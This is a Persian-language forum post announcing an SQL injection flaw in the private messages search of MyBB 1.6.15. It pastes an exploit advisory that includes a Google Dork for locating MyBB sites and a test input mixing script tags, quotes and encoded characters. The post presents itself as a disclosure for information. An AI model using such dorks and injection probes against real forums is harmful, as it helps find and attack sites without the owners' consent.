۱۳۹۳/۶/۲، ۰۹:۲۸:۴۵ صبح
با سلام و درود.
یه مشکل امنیتی جدید منتشر شده در mybb 1.6.15 که در قسمت پیغام خصوصی هستش.
لینکش :
http://www.iedb.ir/exploits-1855.html
تست کردم دیدم توی ورژن های قبلی هم این ارور رو میده.
داخل بعضی از جاها فقط ارور هستش.اما میشه سوء استفاده های دیگه هم کرد.و هیچ محدودیتی واسه این قسمت نیست و ورودی اصلا چک نمیشه.
این فقط برای اطلاع رسانی هستش.
موفق باشید.
یه مشکل امنیتی جدید منتشر شده در mybb 1.6.15 که در قسمت پیغام خصوصی هستش.
کد php:
###########################
# MyBB 1.6.15 - SQL Injection vulnerability
###########################
# Title: MyBB 1.6.15 - SQL Injection
# Google Dork: intext:"Powered By MyBB"
# Date: 15.08.2014
# Author: DemoLisH
# Vendor Homepage: http://www.mybb.com/
# Software Link: http://www.mybb.com/downloads
# Version: 1.6.15
# Contact: onur@b3yaz.org
# Video: http://www.youtube.com/watch?v=_29v1YEZE2s
***************************************************
[~#~] SQL Injection in Private Messages ( User CP )
Go to -> Inbox, for example:
localhost/private.php
Search at the following code Keywords:
<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload
***************************************************
[~#~] Thanks To:
Mugair, X-X-X, PoseidonKairos, DexmoD, Micky, BIGERAN and all TurkeySecurity & Elit-Hack.Org Members.
###########################
# Iranian Exploit DataBase = http://IeDb.Ir [2014-08-17]
###########################
http://www.iedb.ir/exploits-1855.html
تست کردم دیدم توی ورژن های قبلی هم این ارور رو میده.
داخل بعضی از جاها فقط ارور هستش.اما میشه سوء استفاده های دیگه هم کرد.و هیچ محدودیتی واسه این قسمت نیست و ورودی اصلا چک نمیشه.
این فقط برای اطلاع رسانی هستش.
موفق باشید.